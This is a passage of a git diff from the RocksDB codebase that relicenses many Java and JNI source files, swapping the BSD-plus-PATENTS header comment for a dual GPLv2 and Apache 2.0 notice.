b/java/rocksjni/iterator.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::Iterator methods from Java side. diff --git a/java/rocksjni/loggerjnicallback.cc b/java/rocksjni/loggerjnicallback.cc index 74e6eb9ac94..09140ed709a 100644 --- a/java/rocksjni/loggerjnicallback.cc +++ b/java/rocksjni/loggerjnicallback.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the callback "bridge" between Java and C++ for // rocksdb::Logger. diff --git a/java/rocksjni/loggerjnicallback.h b/java/rocksjni/loggerjnicallback.h index cf9030e5112..2db85975d66 100644 --- a/java/rocksjni/loggerjnicallback.h +++ b/java/rocksjni/loggerjnicallback.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the callback "bridge" between Java and C++ for // rocksdb::Logger diff --git a/java/rocksjni/lru_cache.cc b/java/rocksjni/lru_cache.cc index 87b45b0f039..16582689e79 100644 --- a/java/rocksjni/lru_cache.cc +++ b/java/rocksjni/lru_cache.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for // rocksdb::LRUCache. diff --git a/java/rocksjni/memtablejni.cc b/java/rocksjni/memtablejni.cc index ead038d50b3..56a04f9f814 100644 --- a/java/rocksjni/memtablejni.cc +++ b/java/rocksjni/memtablejni.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for MemTables. diff --git a/java/rocksjni/merge_operator.cc b/java/rocksjni/merge_operator.cc index eb753ae421e..1b94382ef04 100644 --- a/java/rocksjni/merge_operator.cc +++ b/java/rocksjni/merge_operator.cc @@ -1,7 +1,7 @@ // Copyright (c) 2014, Vlad Balan (vlad.gm@gmail.com). All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ // for rocksdb::MergeOperator. diff --git a/java/rocksjni/options.cc b/java/rocksjni/options.cc index 295aa6493f6..8194abaf6b6 100644 --- a/java/rocksjni/options.cc +++ b/java/rocksjni/options.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for rocksdb::Options. diff --git a/java/rocksjni/portal.h b/java/rocksjni/portal.h index 91f6fef79c8..ed671ce6e95 100644 --- a/java/rocksjni/portal.h +++ b/java/rocksjni/portal.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // This file is designed for caching those frequently used IDs and provide // efficient portal (i.e, a set of static functions) to access java code diff --git a/java/rocksjni/ratelimiterjni.cc b/java/rocksjni/ratelimiterjni.cc index 99d4f30fd5f..b4174ff102e 100644 --- a/java/rocksjni/ratelimiterjni.cc +++ b/java/rocksjni/ratelimiterjni.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for RateLimiter. diff --git a/java/rocksjni/remove_emptyvalue_compactionfilterjni.cc b/java/rocksjni/remove_emptyvalue_compactionfilterjni.cc index ef17efeec61..8c54a46b864 100644 --- a/java/rocksjni/remove_emptyvalue_compactionfilterjni.cc +++ b/java/rocksjni/remove_emptyvalue_compactionfilterjni.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include diff --git a/java/rocksjni/restorejni.cc b/java/rocksjni/restorejni.cc index 84c8706f012..eb8e65b4a1b 100644 --- a/java/rocksjni/restorejni.cc +++ b/java/rocksjni/restorejni.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling C++ rocksdb::RestoreOptions methods diff --git a/java/rocksjni/rocksdb_exception_test.cc b/java/rocksjni/rocksdb_exception_test.cc index 87900d3c1b0..339d4c5eda3 100644 --- a/java/rocksjni/rocksdb_exception_test.cc +++ b/java/rocksjni/rocksdb_exception_test.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). #include diff --git a/java/rocksjni/rocksjni.cc b/java/rocksjni/rocksjni.cc index 0044271470f..a08a4597142 100644 --- a/java/rocksjni/rocksjni.cc +++ b/java/rocksjni/rocksjni.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::DB methods from Java side. diff --git a/java/rocksjni/slice.cc b/java/rocksjni/slice.cc index a630e9990f6..ef0e384f1a4 100644 --- a/java/rocksjni/slice.cc +++ b/java/rocksjni/slice.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for // rocksdb::Slice. diff --git a/java/rocksjni/snapshot.cc b/java/rocksjni/snapshot.cc index fa8ede7abce..04a0ebfbafa 100644 --- a/java/rocksjni/snapshot.cc +++ b/java/rocksjni/snapshot.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++. diff --git a/java/rocksjni/sst_file_writerjni.cc b/java/rocksjni/sst_file_writerjni.cc index ae8417c19ac..40595fb95df 100644 --- a/java/rocksjni/sst_file_writerjni.cc +++ b/java/rocksjni/sst_file_writerjni.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling C++ rocksdb::SstFileWriter methods diff --git a/java/rocksjni/statistics.cc b/java/rocksjni/statistics.cc index 4b687780666..7b657ada7b6 100644 --- a/java/rocksjni/statistics.cc +++ b/java/rocksjni/statistics.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::Statistics methods from Java side. diff --git a/java/rocksjni/statisticsjni.cc b/java/rocksjni/statisticsjni.cc index dc1d8f9f801..584ab5aa610 100644 --- a/java/rocksjni/statisticsjni.cc +++ b/java/rocksjni/statisticsjni.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the callback "bridge" between Java and C++ for // rocksdb::Statistics diff --git a/java/rocksjni/statisticsjni.h b/java/rocksjni/statisticsjni.h index d7c3ef3aab3..600d9a67632 100644 --- a/java/rocksjni/statisticsjni.h +++ b/java/rocksjni/statisticsjni.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the callback "bridge" between Java and C++ for // rocksdb::Statistics diff --git a/java/rocksjni/table.cc b/java/rocksjni/table.cc index 204d1ba38f8..5f0a4735fed 100644 --- a/java/rocksjni/table.cc +++ b/java/rocksjni/table.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ for rocksdb::Options. diff --git a/java/rocksjni/transaction_log.cc b/java/rocksjni/transaction_log.cc index ed44976fd77..a5049e3b26a 100644 --- a/java/rocksjni/transaction_log.cc +++ b/java/rocksjni/transaction_log.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::Iterator methods from Java side. diff --git a/java/rocksjni/ttl.cc b/java/rocksjni/ttl.cc index 31fdd74ada5..a66ad86d626 100644 --- a/java/rocksjni/ttl.cc +++ b/java/rocksjni/ttl.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::TtlDB methods. diff --git a/java/rocksjni/write_batch.cc b/java/rocksjni/write_batch.cc index 502e1849d76..e84f6ed7d18 100644 --- a/java/rocksjni/write_batch.cc +++ b/java/rocksjni/write_batch.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::WriteBatch methods from Java side. diff --git a/java/rocksjni/write_batch_test.cc b/java/rocksjni/write_batch_test.cc index 06ca4f296f3..0654e01588e 100644 --- a/java/rocksjni/write_batch_test.cc +++ b/java/rocksjni/write_batch_test.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::WriteBatch methods testing from Java side. diff --git a/java/rocksjni/write_batch_with_index.cc b/java/rocksjni/write_batch_with_index.cc index 6a382f894c1..53f2a11d121 100644 --- a/java/rocksjni/write_batch_with_index.cc +++ b/java/rocksjni/write_batch_with_index.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the "bridge" between Java and C++ and enables // calling c++ rocksdb::WriteBatchWithIndex methods from Java side. diff --git a/java/rocksjni/writebatchhandlerjnicallback.cc b/java/rocksjni/writebatchhandlerjnicallback.cc index 2be225b2eb0..0f00766c532 100644 --- a/java/rocksjni/writebatchhandlerjnicallback.cc +++ b/java/rocksjni/writebatchhandlerjnicallback.cc @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the callback "bridge" between Java and C++ for // rocksdb::Comparator. diff --git a/java/rocksjni/writebatchhandlerjnicallback.h b/java/rocksjni/writebatchhandlerjnicallback.h index 791dd9ae9b1..5d3dee3b1a8 100644 --- a/java/rocksjni/writebatchhandlerjnicallback.h +++ b/java/rocksjni/writebatchhandlerjnicallback.h @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). // // This file implements the callback "bridge" between Java and C++ for // rocksdb::WriteBatch::Handler. diff --git a/java/samples/src/main/java/RocksDBColumnFamilySample.java b/java/samples/src/main/java/RocksDBColumnFamilySample.java index 73170d91fb3..650b1b2f600 100644 --- a/java/samples/src/main/java/RocksDBColumnFamilySample.java +++ b/java/samples/src/main/java/RocksDBColumnFamilySample.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). import org.rocksdb.*; diff --git a/java/samples/src/main/java/RocksDBSample.java b/java/samples/src/main/java/RocksDBSample.java index 97007aa7fd5..b1f9805553d 100644 --- a/java/samples/src/main/java/RocksDBSample.java +++ b/java/samples/src/main/java/RocksDBSample.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). import java.lang.IllegalArgumentException; import java.util.Arrays; diff --git a/java/src/main/java/org/rocksdb/AbstractCompactionFilter.java b/java/src/main/java/org/rocksdb/AbstractCompactionFilter.java index 7d3c5bcd92f..976401fba08 100644 --- a/java/src/main/java/org/rocksdb/AbstractCompactionFilter.java +++ b/java/src/main/java/org/rocksdb/AbstractCompactionFilter.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; /** diff --git a/java/src/main/java/org/rocksdb/AbstractComparator.java b/java/src/main/java/org/rocksdb/AbstractComparator.java index 78ee3716585..0fc4a19dfbd 100644 --- a/java/src/main/java/org/rocksdb/AbstractComparator.java +++ b/java/src/main/java/org/rocksdb/AbstractComparator.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/AbstractImmutableNativeReference.java b/java/src/main/java/org/rocksdb/AbstractImmutableNativeReference.java index b0af31ac37a..b1dc1ef3795 100644 --- a/java/src/main/java/org/rocksdb/AbstractImmutableNativeReference.java +++ b/java/src/main/java/org/rocksdb/AbstractImmutableNativeReference.java @@ -1,7 +1,7 @@ // Copyright (c) 2016, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/AbstractNativeReference.java b/java/src/main/java/org/rocksdb/AbstractNativeReference.java index c5aae48909b..ffb0776e4a6 100644 --- a/java/src/main/java/org/rocksdb/AbstractNativeReference.java +++ b/java/src/main/java/org/rocksdb/AbstractNativeReference.java @@ -1,7 +1,7 @@ // Copyright (c) 2016, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/AbstractRocksIterator.java b/java/src/main/java/org/rocksdb/AbstractRocksIterator.java index a1547b3b338..52bd00f47ce 100644 --- a/java/src/main/java/org/rocksdb/AbstractRocksIterator.java +++ b/java/src/main/java/org/rocksdb/AbstractRocksIterator.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/AbstractSlice.java b/java/src/main/java/org/rocksdb/AbstractSlice.java index 75e1f393f7b..5a22e29562e 100644 --- a/java/src/main/java/org/rocksdb/AbstractSlice.java +++ b/java/src/main/java/org/rocksdb/AbstractSlice.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/AbstractWriteBatch.java b/java/src/main/java/org/rocksdb/AbstractWriteBatch.java index 6c08d7e4258..b2e5571809a 100644 --- a/java/src/main/java/org/rocksdb/AbstractWriteBatch.java +++ b/java/src/main/java/org/rocksdb/AbstractWriteBatch.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/AccessHint.java b/java/src/main/java/org/rocksdb/AccessHint.java index 8202e89a839..877c4ab39ae 100644 --- a/java/src/main/java/org/rocksdb/AccessHint.java +++ b/java/src/main/java/org/rocksdb/AccessHint.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/AdvancedColumnFamilyOptionsInterface.java b/java/src/main/java/org/rocksdb/AdvancedColumnFamilyOptionsInterface.java index 54011b983a0..d3908d1a379 100644 --- a/java/src/main/java/org/rocksdb/AdvancedColumnFamilyOptionsInterface.java +++ b/java/src/main/java/org/rocksdb/AdvancedColumnFamilyOptionsInterface.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/AdvancedMutableColumnFamilyOptionsInterface.java b/java/src/main/java/org/rocksdb/AdvancedMutableColumnFamilyOptionsInterface.java index 90b8ec4882e..092fe378435 100644 --- a/java/src/main/java/org/rocksdb/AdvancedMutableColumnFamilyOptionsInterface.java +++ b/java/src/main/java/org/rocksdb/AdvancedMutableColumnFamilyOptionsInterface.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/BackupEngine.java b/java/src/main/java/org/rocksdb/BackupEngine.java index 22f1d359e54..763994575ce 100644 --- a/java/src/main/java/org/rocksdb/BackupEngine.java +++ b/java/src/main/java/org/rocksdb/BackupEngine.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; import java.util.List; diff --git a/java/src/main/java/org/rocksdb/BackupInfo.java b/java/src/main/java/org/rocksdb/BackupInfo.java index f2132c56c8e..10f418629a9 100644 --- a/java/src/main/java/org/rocksdb/BackupInfo.java +++ b/java/src/main/java/org/rocksdb/BackupInfo.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; /** diff --git a/java/src/main/java/org/rocksdb/BackupableDBOptions.java b/java/src/main/java/org/rocksdb/BackupableDBOptions.java index 53a2bb314e7..8bb41433f21 100644 --- a/java/src/main/java/org/rocksdb/BackupableDBOptions.java +++ b/java/src/main/java/org/rocksdb/BackupableDBOptions.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/BlockBasedTableConfig.java b/java/src/main/java/org/rocksdb/BlockBasedTableConfig.java index 050eff1c89b..2d847de29d3 100644 --- a/java/src/main/java/org/rocksdb/BlockBasedTableConfig.java +++ b/java/src/main/java/org/rocksdb/BlockBasedTableConfig.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; /** diff --git a/java/src/main/java/org/rocksdb/BloomFilter.java b/java/src/main/java/org/rocksdb/BloomFilter.java index a8c2f7e7f95..316c3ad838b 100644 --- a/java/src/main/java/org/rocksdb/BloomFilter.java +++ b/java/src/main/java/org/rocksdb/BloomFilter.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/BuiltinComparator.java b/java/src/main/java/org/rocksdb/BuiltinComparator.java index 436cb513f18..2c89bf218d1 100644 --- a/java/src/main/java/org/rocksdb/BuiltinComparator.java +++ b/java/src/main/java/org/rocksdb/BuiltinComparator.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the root directory) and Apache 2.0 License +// (found in the LICENSE.Apache file in the root directory). package org.rocksdb; diff --git a/java/src/main/java/org/rocksdb/Cache.java b/java/src/main/java/org/rocksdb/Cache.java index 2b74b15462f..3952e1d109c 100644 --- a/java/src/main/java/org/rocksdb/Cache.java +++ b/java/src/main/java/org/rocksdb/Cache.java @@ -1,7 +1,7 @@ // Copyright (c) 2011-present, Facebook, Inc. All rights reserved. -// This source code is licensed under the BSD-style license found in the -// LICENSE file in the root directory of this source tree. An additional grant -// of patent rights can be found in the PATENTS file in the same directory. +// This source code is licensed under both the GPLv2 (found in the +// COPYING file in the 